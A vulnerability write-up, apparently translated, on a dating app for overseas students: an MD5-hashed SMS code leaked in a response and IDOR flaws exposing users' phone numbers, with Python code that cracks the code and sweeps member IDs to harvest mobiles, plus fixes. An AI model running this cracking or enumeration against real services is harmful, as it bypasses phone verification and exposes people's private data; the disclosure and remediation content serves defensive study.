Better: privilege escalation (IDOR) vulnerabilities in the hottest dating community app for overseas students, exposing millions of users' data
First, register an account: tap "Register by phone".
Enter a mobile number to receive the verification code; I used 13012345678.
Now capture the request and look at what the server returns.
The response contains a field named identifying_code holding the MD5 of the SMS verification code. Since the code is a short numeric string, the hash is trivially reversed (a rainbow-table lookup or a few seconds of brute force) and the code is recovered.
Eh? It really is the verification code! Sure enough, the check passes with the recovered value, and registration completes without ever owning the phone number. On to the next step.
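The step above, as an added example that is not part of the original report: parse a captured registration response, pull out the leaked identifying_code hash, and recover the plaintext code by exhausting the numeric space. The JSON shape of the response and the code length (4 to 6 digits) are assumptions; the field name identifying_code is the one the page reports. The sample response is constructed here, with the code 4821 chosen for the demonstration.

```python
import hashlib
import json
from typing import Optional

# Constructed sample of the registration response, modelled on the page's
# description. The field name identifying_code is from the page; the rest
# of the JSON shape is assumed.
SAMPLE_RESPONSE = json.dumps({
    "status": 1,
    "msg": "ok",
    # the server leaks the MD5 of the SMS code it just sent
    "identifying_code": hashlib.md5(b"4821").hexdigest(),
})


def md5_hex(text: str) -> str:
    """MD5 hex digest of a string, the way the server appears to compute it."""
    return hashlib.md5(text.encode()).hexdigest()


def extract_leaked_hash(body: str) -> Optional[str]:
    """Pull the identifying_code field out of a captured JSON response."""
    try:
        data = json.loads(body)
    except ValueError:
        return None
    value = data.get("identifying_code") if isinstance(data, dict) else None
    if isinstance(value, str) and len(value) == 32:
        return value.lower()
    return None


def crack_code(leaked_md5: str, min_len: int = 4, max_len: int = 6) -> Optional[str]:
    """Recover a numeric SMS code from its MD5 by exhaustive search.

    Code length is an assumption: SMS codes are usually 4 to 6 digits, so the
    whole space is about 1.1 million hashes and finishes in a second or two.
    """
    target = leaked_md5.strip().lower()
    for length in range(min_len, max_len + 1):
        for n in range(10 ** length):
            candidate = f"{n:0{length}d}"  # keep leading zeros, e.g. "0042"
            if md5_hex(candidate) == target:
                return candidate
    return None


def recover_code_from_response(body: str) -> Optional[str]:
    """End to end: captured response in, plaintext verification code out."""
    leaked = extract_leaked_hash(body)
    return crack_code(leaked) if leaked else None


if __name__ == "__main__":
    print(recover_code_from_response(SAMPLE_RESPONSE))
```

Hashing does nothing for a secret drawn from a space this small; the only fix is to keep the code server-side (or in the SMS) and never return it, hashed or otherwise, to the client that requested it.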
Let's look at what other people's profiles contain. After registration, the friend the app recommended to me was an official operations engineer.
I saw Beibei's mobile phone number in her profile. By iterating over all member IDs from here, I can collect the phone numbers of many sisters \(^o^)/. Viewing a topic is also vulnerable to IDOR: change the member_id in the POST body and the server returns someone else's data. Although a token is sent with the request, it is not checked against the member_id at all.
Following a user is the same: change member_id to the other party's and the follow is performed on their behalf.
The app has a variety of similar issues, such as replying as another user, deleting as another user, and other over-privileged actions. I contacted the official staff member Beibei, who was very nice, and reported all of the issues above to her.
Solution:
The token must do more than prove that login_member_id is logged in. For every request that names a member_id, the server must check that it matches the member_id the token was issued for, or better, derive the acting member from the session and ignore the member_id supplied by the client.
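The IDOR described above and its fix, as an added example that is not the app's own code: the vulnerable handlers check only that a session token exists, so any logged-in member can read any member_id or follow on someone else's behalf; the fixed handlers bind the request to the member the token was issued for. The session store, member records, phone numbers and the enumeration helper are all constructed here for the demonstration.

```python
from typing import Callable, Dict, Optional, Set

# Constructed fixture: session tokens issued at login and the member they belong to.
SESSIONS: Dict[str, int] = {"tok-attacker": 1001, "tok-beibei": 1002}

# Constructed member records with fake mobiles. The page reports that the
# real app returned real phone numbers in exactly this way.
MEMBERS: Dict[int, dict] = {
    1001: {"nickname": "attacker", "mobile": "13012345678"},
    1002: {"nickname": "beibei",   "mobile": "13000000002"},
    1003: {"nickname": "sister1",  "mobile": "13000000003"},
    1004: {"nickname": "sister2",  "mobile": "13000000004"},
}

# Follow relations: acting member_id -> set of followed member_ids.
FOLLOWS: Dict[int, Set[int]] = {}


def get_member_vulnerable(token: str, member_id: int) -> dict:
    """Behaviour the page describes: the token is only checked for existence,
    so any logged-in user can read any member_id they put in the body."""
    if token not in SESSIONS:
        raise PermissionError("login required")
    return MEMBERS[member_id]


def get_member_fixed(token: str, member_id: int) -> dict:
    """Bind the request to the token: member_id must be the one the session
    was issued for, otherwise reject before touching any data."""
    login_member_id = SESSIONS.get(token)
    if login_member_id is None:
        raise PermissionError("login required")
    if login_member_id != member_id:
        raise PermissionError("member_id does not belong to this session")
    return MEMBERS[member_id]


def follow_vulnerable(token: str, member_id: int, target_id: int) -> None:
    """The page's 'unauthorized follow': the acting member is whatever
    member_id the client sent."""
    if token not in SESSIONS:
        raise PermissionError("login required")
    FOLLOWS.setdefault(member_id, set()).add(target_id)


def follow_fixed(token: str, target_id: int) -> None:
    """The acting member comes from the session; there is no member_id
    parameter for the client to tamper with."""
    login_member_id = SESSIONS.get(token)
    if login_member_id is None:
        raise PermissionError("login required")
    FOLLOWS.setdefault(login_member_id, set()).add(target_id)


def enumerate_mobiles(handler: Callable[[str, int], dict], token: str,
                      first_id: int, last_id: int) -> Dict[int, str]:
    """Sweep a member_id range the way the page describes and keep whatever
    phone numbers the handler gives up."""
    found: Dict[int, str] = {}
    for member_id in range(first_id, last_id + 1):
        try:
            found[member_id] = handler(token, member_id)["mobile"]
        except (PermissionError, KeyError):
            continue
    return found


if __name__ == "__main__":
    print("vulnerable:", enumerate_mobiles(get_member_vulnerable, "tok-attacker", 1000, 1010))
    print("fixed:     ", enumerate_mobiles(get_member_fixed, "tok-attacker", 1000, 1010))
```

Against the vulnerable handler the sweep returns every member's mobile; against the fixed one it returns only the attacker's own record. For endpoints that legitimately reference other members (viewing a public profile, replying to a topic), the same rule applies to the acting identity: take it from the session, and filter fields such as the phone number so they are only returned to their owner.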